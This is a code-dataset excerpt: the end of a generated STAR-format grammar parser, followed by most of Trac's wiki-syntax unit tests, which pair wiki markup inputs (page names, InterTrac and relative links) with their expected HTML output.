raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b', 'c_s_b']))
if self._peek() not in ['c_s_b', 'data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['data_value_1', 'c_s_b', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b']))
c_s_b = self._scan('c_s_b')
return StarList(this_list)
def curly_bracket_expr(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'curly_bracket_expr', [])
o_c_b = self._scan('o_c_b')
table_as_list = []
while self._peek('c_c_b', 'triple_quote_data_value', 'single_quote_data_value') != 'c_c_b':
delimited_data_value = self.delimited_data_value(_context)
table_as_list = [delimited_data_value]
self._scan('":"')
data_value = self.data_value(_context)
table_as_list.append(data_value)
while self._peek('triple_quote_data_value', 'single_quote_data_value', 'c_c_b') != 'c_c_b':
delimited_data_value = self.delimited_data_value(_context)
table_as_list.append(delimited_data_value)
self._scan('":"')
data_value = self.data_value(_context)
table_as_list.append(data_value)
if self._peek() not in ['triple_quote_data_value', 'single_quote_data_value', 'c_c_b']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['triple_quote_data_value', 'single_quote_data_value', 'c_c_b']))
if self._peek() not in ['c_c_b', 'triple_quote_data_value', 'single_quote_data_value']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['triple_quote_data_value', 'single_quote_data_value', 'c_c_b']))
c_c_b = self._scan('c_c_b')
return StarDict(pairwise(table_as_list))
def parse(rule, text):
P = StarParser(StarParserScanner(text))
return yappsrt.wrap_error_reporter(P, rule)
# End -- grammar generated by Yapps
|
mit
| 7,016,748,564,123,988,000 | 57.227642 | 479 | 0.602066 | false |
dafrito/trac-mirror
|
trac/wiki/tests/wikisyntax.py
|
1
|
35299
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2006-2013 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
from datetime import datetime
import unittest
from trac.util.datefmt import utc
from trac.wiki.model import WikiPage
from trac.wiki.tests import formatter
TEST_CASES = u"""
============================== wiki: link resolver
wiki:TestPage
wiki:TestPage/
wiki:/TestPage
[wiki:/TestPage]
[wiki:/TestPage ]
[wiki:/TestPage\u200B]
[wiki:/TestPage /TestPage]
wiki:"Space 1 23"
wiki:"C'est l'\xe9t\xe9"
wiki:MissingPage
wiki:12
wiki:abc
------------------------------
<p>
<a class="wiki" href="/wiki/TestPage">wiki:TestPage</a>
<a class="wiki" href="/wiki/TestPage">wiki:TestPage/</a>
<a class="wiki" href="/wiki/TestPage">wiki:/TestPage</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="wiki" href="/wiki/TestPage">/TestPage</a>
<a class="wiki" href="/wiki/Space%201%2023">wiki:"Space 1 23"</a>
<a class="wiki" href="/wiki/C'est%20l'%C3%A9t%C3%A9">wiki:"C'est l'\xe9t\xe9"</a>
<a class="missing wiki" href="/wiki/MissingPage" rel="nofollow">wiki:MissingPage?</a>
<a class="missing wiki" href="/wiki/12" rel="nofollow">wiki:12?</a>
<a class="missing wiki" href="/wiki/abc" rel="nofollow">wiki:abc?</a>
</p>
------------------------------
============================== wiki: link resolver + query and fragment
wiki:TestPage?format=txt
wiki:TestPage/?version=12
wiki:TestPage/?action=diff&version=12
wiki:"Space 1 23#heading"
------------------------------
<p>
<a class="wiki" href="/wiki/TestPage?format=txt">wiki:TestPage?format=txt</a>
<a class="wiki" href="/wiki/TestPage?version=12">wiki:TestPage/?version=12</a>
<a class="wiki" href="/wiki/TestPage?action=diff&version=12">wiki:TestPage/?action=diff&version=12</a>
<a class="wiki" href="/wiki/Space%201%2023#heading">wiki:"Space 1 23#heading"</a>
</p>
------------------------------
============================== WikiPageNames conformance
CamelCase AlabamA ABc AlaBamA FooBar
------------------------------
<p>
<a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase?</a> AlabamA ABc AlaBamA <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>
</p>
------------------------------
============================== WikiPageNames conformance (unicode)
SmÅogstore should produce a link
and so should wiki:ÜberflüssigkeitsTheorie
------------------------------
<p>
<a class="missing wiki" href="/wiki/Sm%C3%85ogstore" rel="nofollow">SmÅogstore?</a> should produce a link
and so should <a class="missing wiki" href="/wiki/%C3%9Cberfl%C3%BCssigkeitsTheorie" rel="nofollow">wiki:ÜberflüssigkeitsTheorie?</a>
</p>
------------------------------
============================== More WikiPageNames conformance
CamelCase,CamelCase.CamelCase: CamelCase
But not CamelCase2
nor CamelCase_
------------------------------
<p>
<a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase?</a>,<a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase?</a>.<a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase?</a>: <a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase?</a>
But not CamelCase2
nor CamelCase_
</p>
------------------------------
============================== Escaping WikiPageNames
!CamelCase
------------------------------
<p>
CamelCase
</p>
------------------------------
============================== WikiPageNames endings
foo (FooBar )
foo FooBar: something
foo FooBar.
FooBar, foo
foo FooBar;
foo FooBar!
foo FooBar?
foo (FooBar)
foo {FooBar}
foo 'FooBar'
foo "FooBar"
foo [FooBar]
------------------------------
<p>
foo (<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a> )
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>: something
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>.
<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>, foo
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>;
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>!
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>?
foo (<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>)
foo {<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>}
foo '<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>'
foo "<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>"
foo [<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar?</a>]
</p>
------------------------------
============================== WikiPageNames counter examples
A0B1, ST62T53C6, IR32V1H000
------------------------------
<p>
A0B1, ST62T53C6, IR32V1H000
</p>
------------------------------
============================== WikiPageNames with fragment identifier
SandBox#heading-fixed-id
wiki:TracSubversion#TracandSubversion1.3.1. etc.
TracSubversion#TracandSubversion1.3.1. etc.
------------------------------
<p>
<a class="missing wiki" href="/wiki/SandBox#heading-fixed-id" rel="nofollow">SandBox#heading-fixed-id?</a>
</p>
<p>
<a class="missing wiki" href="/wiki/TracSubversion#TracandSubversion1.3.1" rel="nofollow">wiki:TracSubversion#TracandSubversion1.3.1?</a>. etc.
<a class="missing wiki" href="/wiki/TracSubversion#TracandSubversion1.3.1" rel="nofollow">TracSubversion#TracandSubversion1.3.1?</a>. etc.
</p>
------------------------------
============================== WikiPageNames with fragment id (performance test)
BillOfMaterials#get_bill_of_materials_from_room_xml(fpxml=nil)
[BillOfMaterials#get_bill_of_materials_from_room_xml(fpxml=nil)]
[BillOfMaterials#get_bill_of_materials_from_room_xml(fpxml=nil) speed]
------------------------------
<p>
<a class="missing wiki" href="/wiki/BillOfMaterials#get_bill_of_materials_from_room_xml" rel="nofollow">BillOfMaterials#get_bill_of_materials_from_room_xml?</a>(fpxml=nil)
</p>
<p>
[<a class="missing wiki" href="/wiki/BillOfMaterials#get_bill_of_materials_from_room_xml" rel="nofollow">BillOfMaterials#get_bill_of_materials_from_room_xml?</a>(fpxml=nil)]
</p>
<p>
[<a class="missing wiki" href="/wiki/BillOfMaterials#get_bill_of_materials_from_room_xml" rel="nofollow">BillOfMaterials#get_bill_of_materials_from_room_xml?</a>(fpxml=nil) speed]
</p>
------------------------------
============================== WikiPageNames counter examples (paths)
/absolute/path/is/NotWiki and relative/path/is/NotWiki and ../higher/is/NotWiki
but ThisIs/SubWiki and now This/Also
and ../Relative/Camel or /Absolute/Camel as well
------------------------------
<p>
/absolute/path/is/NotWiki and relative/path/is/NotWiki and ../higher/is/NotWiki
but <a class="missing wiki" href="/wiki/ThisIs/SubWiki" rel="nofollow">ThisIs/SubWiki?</a> and now <a class="missing wiki" href="/wiki/This/Also" rel="nofollow">This/Also?</a>
and <a class="missing wiki" href="/wiki/Relative/Camel" rel="nofollow">../Relative/Camel?</a> or <a class="missing wiki" href="/wiki/Absolute/Camel" rel="nofollow">/Absolute/Camel?</a> as well
</p>
------------------------------
============================== WikiPageNames counter examples (numbers)
8FjBpOmy
anotherWikiPageName
------------------------------
<p>
8FjBpOmy
anotherWikiPageName
</p>
------------------------------
8FjBpOmy
anotherWikiPageName
============================== WikiPageNames counter examples (unicode)
Småbokstaver should not produce a link
neither should AbAbÅ nor AbAbÅÅb
------------------------------
<p>
Småbokstaver should not produce a link
neither should AbAbÅ nor AbAbÅÅb
</p>
------------------------------
Småbokstaver should not produce a link
neither should AbAbÅ nor AbAbÅÅb
============================== not a WikiPageNames at all (#9025 regression)
[ሀሁሂሃሄህሆለሉሊላሌልሎሏሐሑሒሓሔሕሖመሙሚማሜምሞሟሠሡሢሣሤሥሦረሩሪራሬርሮሯሰሱሲሳሴስሶሷሸሹሺሻሼሽሾሿቀቁቂቃቄቅቆቈቊቋቌቍቐቑቒቓቔቕቖቘቚቛቜቝበቡቢባቤብቦቧቨቩቪቫቬቭቮቯተቱቲታቴትቶቷቸቹቺቻቼችቾቿኀኁኂኃኄኅኆኈኊኋኌኍነኑኒናኔንኖኗኘኙኚኛኜኝኞኟአኡኢኣኤእኦኧከኩኪካኬክኮኰኲኳኴኵኸኹኺኻኼኽኾወዉዊዋዌውዎዐዑዒዓዔዕዖዘዙዚዛዜዝዞዟዠዡዢዣዤዥዦዧየዩዪያዬይዮደዱዲዳዴድዶዷጀጁጂጃጄጅጆጇገጉጊጋጌግጎጐጒጓጔጕጠጡጢጣጤጥጦጧጨጩጪጫጬጭጮጯጰጱጲጳጴጵጶጷጸጹጺጻጼጽጾጿፀፁፂፃፄፅፆፈፉፊፋፌፍፎፏፐፑፒፓፔፕፖፗፘፙፚ፩፪፫፬፭፮፯፰፱፲፳፴፵፶፷፸፹፺፻]------------------------------
<p>
[ሀሁሂሃሄህሆለሉሊላሌልሎሏሐሑሒሓሔሕሖመሙሚማሜምሞሟሠሡሢሣሤሥሦረሩሪራሬርሮሯሰሱሲሳሴስሶሷሸሹሺሻሼሽሾሿቀቁቂቃቄቅቆቈቊቋቌቍቐቑቒቓቔቕቖቘቚቛቜቝበቡቢባቤብቦቧቨቩቪቫቬቭቮቯተቱቲታቴትቶቷቸቹቺቻቼችቾቿኀኁኂኃኄኅኆኈኊኋኌኍነኑኒናኔንኖኗኘኙኚኛኜኝኞኟአኡኢኣኤእኦኧከኩኪካኬክኮኰኲኳኴኵኸኹኺኻኼኽኾወዉዊዋዌውዎዐዑዒዓዔዕዖዘዙዚዛዜዝዞዟዠዡዢዣዤዥዦዧየዩዪያዬይዮደዱዲዳዴድዶዷጀጁጂጃጄጅጆጇገጉጊጋጌግጎጐጒጓጔጕጠጡጢጣጤጥጦጧጨጩጪጫጬጭጮጯጰጱጲጳጴጵጶጷጸጹጺጻጼጽጾጿፀፁፂፃፄፅፆፈፉፊፋፌፍፎፏፐፑፒፓፔፕፖፗፘፙፚ፩፪፫፬፭፮፯፰፱፲፳፴፵፶፷፸፹፺፻]
</p>
------------------------------
[ሀሁሂሃሄህሆለሉሊላሌልሎሏሐሑሒሓሔሕሖመሙሚማሜምሞሟሠሡሢሣሤሥሦረሩሪራሬርሮሯሰሱሲሳሴስሶሷሸሹሺሻሼሽሾሿቀቁቂቃቄቅቆቈቊቋቌቍቐቑቒቓቔቕቖቘቚቛቜቝበቡቢባቤብቦቧቨቩቪቫቬቭቮቯተቱቲታቴትቶቷቸቹቺቻቼችቾቿኀኁኂኃኄኅኆኈኊኋኌኍነኑኒናኔንኖኗኘኙኚኛኜኝኞኟአኡኢኣኤእኦኧከኩኪካኬክኮኰኲኳኴኵኸኹኺኻኼኽኾወዉዊዋዌውዎዐዑዒዓዔዕዖዘዙዚዛዜዝዞዟዠዡዢዣዤዥዦዧየዩዪያዬይዮደዱዲዳዴድዶዷጀጁጂጃጄጅጆጇገጉጊጋጌግጎጐጒጓጔጕጠጡጢጣጤጥጦጧጨጩጪጫጬጭጮጯጰጱጲጳጴጵጶጷጸጹጺጻጼጽጾጿፀፁፂፃፄፅፆፈፉፊፋፌፍፎፏፐፑፒፓፔፕፖፗፘፙፚ፩፪፫፬፭፮፯፰፱፲፳፴፵፶፷፸፹፺፻]
============================== MoinMoin style forced links
This is a ["Wiki"] page link.
This is a ["Wiki" wiki page] link with label.
This is a ["Wiki?param=1#fragment"] page link with query and fragment.
------------------------------
<p>
This is a <a class="missing wiki" href="/wiki/Wiki" rel="nofollow">Wiki?</a> page link.
This is a <a class="missing wiki" href="/wiki/Wiki" rel="nofollow">wiki page?</a> link with label.
This is a <a class="missing wiki" href="/wiki/Wiki?param=1#fragment" rel="nofollow">Wiki?</a> page link with query and fragment.
</p>
------------------------------
============================== Wiki links with @version
wiki:page@12
WikiStart@12
WikiStart@12#heading
[WikiStart@12]
[WikiStart@12#heading]
This is a ["Wiki@12"] page link.
[wiki:WikiStart@12?format=txt v12 as text]
------------------------------
<p>
<a class="missing wiki" href="/wiki/page?version=12" rel="nofollow">wiki:page@12?</a>
<a class="wiki" href="/wiki/WikiStart?version=12">WikiStart@12</a>
<a class="wiki" href="/wiki/WikiStart?version=12#heading">WikiStart@12#heading</a>
[<a class="wiki" href="/wiki/WikiStart?version=12">WikiStart@12</a>]
[<a class="wiki" href="/wiki/WikiStart?version=12#heading">WikiStart@12#heading</a>]
This is a <a class="missing wiki" href="/wiki/Wiki?version=12" rel="nofollow">Wiki@12?</a> page link.
<a class="wiki" href="/wiki/WikiStart?version=12&format=txt">v12 as text</a>
</p>
------------------------------
============================== WikiPageName with label
See details of the [WikiPageNames wiki page name] syntax.
Here's a [BadExample\fbad] example with special whitespace.
We can also [WikiLabels '"use [quotes]"']
or [WikiLabels "'use [quotes]'"]
------------------------------
<p>
See details of the <a class="missing wiki" href="/wiki/WikiPageNames" rel="nofollow">wiki page name?</a> syntax.
Here's a <a class="missing wiki" href="/wiki/BadExample" rel="nofollow">bad?</a> example with special whitespace.
We can also <a class="missing wiki" href="/wiki/WikiLabels" rel="nofollow">"use [quotes]"?</a>
or <a class="missing wiki" href="/wiki/WikiLabels" rel="nofollow">'use [quotes]'?</a>
</p>
------------------------------
============================== WikiPageName with label should be strict...
new_channel_name [, '''integer''' handle [, '''boolean''' test]]
------------------------------
<p>
new_channel_name [, <strong>integer</strong> handle [, <strong>boolean</strong> test]]
</p>
------------------------------
============================== InterTrac for wiki
t:wiki:InterTrac
trac:wiki:InterTrac
[t:wiki:InterTrac intertrac]
[trac:wiki:InterTrac intertrac]
[trac:wiki:JonasBorgström jonas]
------------------------------
<p>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in Trac's Trac"><span class="icon"></span>t:wiki:InterTrac</a>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in Trac's Trac"><span class="icon"></span>trac:wiki:InterTrac</a>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in Trac's Trac"><span class="icon"></span>intertrac</a>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/wiki%3AInterTrac" title="wiki:InterTrac in Trac's Trac"><span class="icon"></span>intertrac</a>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/wiki%3AJonasBorgstr%C3%B6m" title="wiki:JonasBorgström in Trac's Trac"><span class="icon"></span>jonas</a>
</p>
------------------------------
============================== Wiki InterTrac shorthands
t:InterTrac
trac:InterTrac
[t:InterTrac intertrac]
[trac:InterTrac intertrac]
[trac:JonasBorgström jonas]
------------------------------
<p>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in Trac's Trac"><span class="icon"></span>t:InterTrac</a>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in Trac's Trac"><span class="icon"></span>trac:InterTrac</a>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in Trac's Trac"><span class="icon"></span>intertrac</a>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/InterTrac" title="InterTrac in Trac's Trac"><span class="icon"></span>intertrac</a>
<a class="ext-link" href="http://trac.edgewall.org/intertrac/JonasBorgstr%C3%B6m" title="JonasBorgström in Trac's Trac"><span class="icon"></span>jonas</a>
</p>
------------------------------
============================== InterWiki links
This is the original MeatBall:InterMapTxt wiki page.
Checkout the [tsvn:http://svn.edgewall.com/repos/trac Trac Repository].
complex link complex:a:test with positional arguments
complex link complex:a (not enough arguments)
complex link complex:a:test:more (too many arguments)
in trac.ini inter:b:resource
in trac.ini over:c:something overrides wiki
NoLink:ignored
NoLink:
NoLink: ...
------------------------------
<p>
This is the original <a class="ext-link" href="http://www.usemod.com/cgi-bin/mb.pl?InterMapTxt" title="InterMapTxt in MeatBall..."><span class="icon"></span>MeatBall:InterMapTxt</a> wiki page.
Checkout the <a class="ext-link" href="tsvn:http://svn.edgewall.com/repos/trac" title="http://svn.edgewall.com/repos/trac in tsvn"><span class="icon"></span>Trac Repository</a>.
</p>
<p>
complex link <a class="ext-link" href="http://server/a/page/test?format=txt" title="resource test in a"><span class="icon"></span>complex:a:test</a> with positional arguments
complex link <a class="ext-link" href="http://server/a/page/?format=txt" title="resource in a"><span class="icon"></span>complex:a</a> (not enough arguments)
complex link <a class="ext-link" href="http://server/a/page/test:more?format=txt" title="resource test:more in a"><span class="icon"></span>complex:a:test:more</a> (too many arguments)
</p>
<p>
in trac.ini <a class="ext-link" href="http://inter/b/page/resource" title="Resource resource in b"><span class="icon"></span>inter:b:resource</a>
in trac.ini <a class="ext-link" href="http://over/c/page/something" title="c:something in over"><span class="icon"></span>over:c:something</a> overrides wiki
</p>
<p>
NoLink:ignored
<a class="missing wiki" href="/wiki/NoLink" rel="nofollow">NoLink?</a>:
<a class="missing wiki" href="/wiki/NoLink" rel="nofollow">NoLink?</a>: ...
</p>
------------------------------
============================== InterWiki links with parameters and fragment
See also MeatBall:InterMapTxt#there wiki page
and MeatBall:InterMapTxt?format=txt#there wiki page.
complex link complex:a:test?go#there with positional arguments
------------------------------
<p>
See also <a class="ext-link" href="http://www.usemod.com/cgi-bin/mb.pl?InterMapTxt#there" title="InterMapTxt in MeatBall..."><span class="icon"></span>MeatBall:InterMapTxt#there</a> wiki page
and <a class="ext-link" href="http://www.usemod.com/cgi-bin/mb.pl?InterMapTxt&format=txt#there" title="InterMapTxt in MeatBall..."><span class="icon"></span>MeatBall:InterMapTxt?format=txt#there</a> wiki page.
</p>
<p>
complex link <a class="ext-link" href="http://server/a/page/test?format=txt&go#there" title="resource test in a"><span class="icon"></span>complex:a:test?go#there</a> with positional arguments
</p>
------------------------------
============================== Regression for #9712
This is not a link: x,://localhost
------------------------------
<p>
This is not a link: x,:<em>localhost
</em></p>
------------------------------
============================== Wiki links with @version using unicode digits
WikiStart@₄₂
WikiStart@₄₂#heading
[WikiStart@₄₂]
[WikiStart@₄₂#heading]
------------------------------
<p>
<a class="wiki" href="/wiki/WikiStart">WikiStart</a>@₄₂
<a class="wiki" href="/wiki/WikiStart">WikiStart</a>@₄₂#heading
[<a class="wiki" href="/wiki/WikiStart">WikiStart</a>@₄₂]
[<a class="wiki" href="/wiki/WikiStart">WikiStart</a>@₄₂#heading]
</p>
------------------------------
""" #" Emacs likes it that way better
RELATIVE_LINKS_TESTS = u"""
============================== Relative to the project url
[//docs Documentation]
[//docs?param=1#fragment Documentation]
[//docs]
[//docs //docs]
[//docs?param=1#fragment]
[// Home]
[//]
[//?param=1#fragment]
------------------------------
<p>
<a href="/docs">Documentation</a>
<a href="/docs?param=1#fragment">Documentation</a>
<a href="/docs">docs</a>
<a href="/docs">//docs</a>
<a href="/docs?param=1#fragment">docs</a>
<a href="/">Home</a>
<a href="/">//</a>
<a href="/?param=1#fragment">//</a>
</p>
------------------------------
============================== Relative to the base url
[/newticket?priority=high#fragment bug]
[/newticket?priority=high#fragment]
[/newticket]
[/newticket /newticket]
[/ Project]
[/]
[/?param=1#fragment]
------------------------------
<p>
<a href="/newticket?priority=high#fragment">bug</a>
<a href="/newticket?priority=high#fragment">newticket</a>
<a href="/newticket">newticket</a>
<a href="/newticket">/newticket</a>
<a href="/">Project</a>
<a href="/">/</a>
<a href="/?param=1#fragment">/</a>
</p>
------------------------------
============================== Relative to the current page
[.]
[./]
[..]
[../]
[./../.]
[. this page]
[./Detail see detail]
[./Detail]
[./Detail ./Detail]
[.. see parent]
[../Other see other]
[../Other]
[../Other ../Other]
[.././../Other]
------------------------------
<p>
<a class="wiki" href="/wiki/Main/Sub">.</a>
<a class="wiki" href="/wiki/Main/Sub">./</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">..?</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">../?</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">./../.?</a>
<a class="wiki" href="/wiki/Main/Sub">this page</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">see detail?</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">Detail?</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">./Detail?</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">see parent?</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">see other?</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">Other?</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">../Other?</a>
<a class="missing wiki" href="/wiki/Other" rel="nofollow">Other?</a>
</p>
------------------------------
============================== Relative to the current page, in wiki realm
[wiki:. this page]
[wiki:./Detail]
[wiki:"./Detail"]
[wiki:./Detail ./Detail]
[wiki:./Detail see detail]
[wiki:.. see parent]
[wiki:../Other see other]
[wiki:.././../Other]
["."]
[".?param=1#fragment"]
["./Detail"]
["./Detail?param=1#fragment"]
[".."]
["..?param=1#fragment"]
["../Other"]
["../Other?param=1#fragment"]
[".././../Other"]
------------------------------
<p>
<a class="wiki" href="/wiki/Main/Sub">this page</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">Detail?</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">Detail?</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">./Detail?</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">see detail?</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">see parent?</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">see other?</a>
<a class="missing wiki" href="/wiki/Other" rel="nofollow">Other?</a>
<a class="wiki" href="/wiki/Main/Sub">.</a>
<a class="wiki" href="/wiki/Main/Sub?param=1#fragment">.</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail" rel="nofollow">Detail?</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail?param=1#fragment" rel="nofollow">Detail?</a>
<a class="missing wiki" href="/wiki/Main" rel="nofollow">..?</a>
<a class="missing wiki" href="/wiki/Main?param=1#fragment" rel="nofollow">..?</a>
<a class="missing wiki" href="/wiki/Main/Other" rel="nofollow">Other?</a>
<a class="missing wiki" href="/wiki/Main/Other?param=1#fragment" rel="nofollow">Other?</a>
<a class="missing wiki" href="/wiki/Other" rel="nofollow">Other?</a>
</p>
------------------------------
============================== Relative to the current page, as CamelCase
OnePage/SubPage
./SubPage
../SiblingPage
.././../HigherPage
/TopPage
------------------------------
<p>
<a class="missing wiki" href="/wiki/Main/OnePage/SubPage" rel="nofollow">OnePage/SubPage?</a>
<a class="missing wiki" href="/wiki/Main/Sub/SubPage" rel="nofollow">./SubPage?</a>
<a class="missing wiki" href="/wiki/Main/SiblingPage" rel="nofollow">../SiblingPage?</a>
<a class="missing wiki" href="/wiki/HigherPage" rel="nofollow">.././../HigherPage?</a>
<a class="missing wiki" href="/wiki/TopPage" rel="nofollow">/TopPage?</a>
</p>
------------------------------
============================== Relative to the current page with query strings and fragments
[#topic see topic]
[?param=1#topic see topic]
[.#topic see topic]
[.?param=1#topic see topic]
[./#topic see topic]
[./?param=1#topic see topic]
[./Detail#topic see detail]
[./Detail?param=1#topic see detail]
[./Detail?param=1#topic]
[..#topic see parent]
[..?param=1#topic see parent]
[../#topic see parent]
[../?param=1#topic see parent]
[../Other#topic see other]
[../Other?param=1#topic see other]
[../Other?param=1#topic]
[../Other/#topic see other]
[../Other/?param=1#topic see other]
------------------------------
<p>
<a class="wiki" href="/wiki/Main/Sub#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub?param=1#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub?param=1#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub#topic">see topic</a>
<a class="wiki" href="/wiki/Main/Sub?param=1#topic">see topic</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail#topic" rel="nofollow">see detail?</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail?param=1#topic" rel="nofollow">see detail?</a>
<a class="missing wiki" href="/wiki/Main/Sub/Detail?param=1#topic" rel="nofollow">Detail?</a>
<a class="missing wiki" href="/wiki/Main#topic" rel="nofollow">see parent?</a>
<a class="missing wiki" href="/wiki/Main?param=1#topic" rel="nofollow">see parent?</a>
<a class="missing wiki" href="/wiki/Main#topic" rel="nofollow">see parent?</a>
<a class="missing wiki" href="/wiki/Main?param=1#topic" rel="nofollow">see parent?</a>
<a class="missing wiki" href="/wiki/Main/Other#topic" rel="nofollow">see other?</a>
<a class="missing wiki" href="/wiki/Main/Other?param=1#topic" rel="nofollow">see other?</a>
<a class="missing wiki" href="/wiki/Main/Other?param=1#topic" rel="nofollow">Other?</a>
<a class="missing wiki" href="/wiki/Main/Other#topic" rel="nofollow">see other?</a>
<a class="missing wiki" href="/wiki/Main/Other?param=1#topic" rel="nofollow">see other?</a>
</p>
------------------------------
""" # "
SPLIT_PAGE_NAMES_TESTS = u"""
============================== Splitting relative links
[//WikiPage]
[/WikiPage]
[./WikiPage]
[../WikiPage]
[//WikiPage?param=1#fragment]
[/WikiPage?param=1#fragment]
[./WikiPage?param=1#fragment]
[../WikiPage?param=1#fragment]
But not [./wiki_page]
And not [../WikiPage WikiPage]
------------------------------
<p>
<a href="/WikiPage">Wiki Page</a>
<a href="/WikiPage">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page?</a>
<a href="/WikiPage?param=1#fragment">Wiki Page</a>
<a href="/WikiPage?param=1#fragment">Wiki Page</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage?param=1#fragment" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page?</a>
But not <a class="missing wiki" href="/wiki/Main/Sub/wiki_page" rel="nofollow">wiki_page?</a>
And not <a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">WikiPage?</a>
</p>
------------------------------
============================== Splitting scoped links
[wiki:WikiPage]
[wiki:./WikiPage]
[wiki:../WikiPage]
[wiki:./.././WikiPage]
[wiki:"./.././WikiPage"]
[wiki:WikiPage?param=1#fragment]
[wiki:./WikiPage?param=1#fragment]
[wiki:../WikiPage?param=1#fragment]
But not [wiki:./wiki_page]
And not [wiki:../WikiPage WikiPage]
------------------------------
<p>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/Sub/WikiPage?param=1#fragment" rel="nofollow">Wiki Page?</a>
<a class="missing wiki" href="/wiki/Main/WikiPage?param=1#fragment" rel="nofollow">Wiki Page?</a>
But not <a class="missing wiki" href="/wiki/Main/Sub/wiki_page" rel="nofollow">wiki_page?</a>
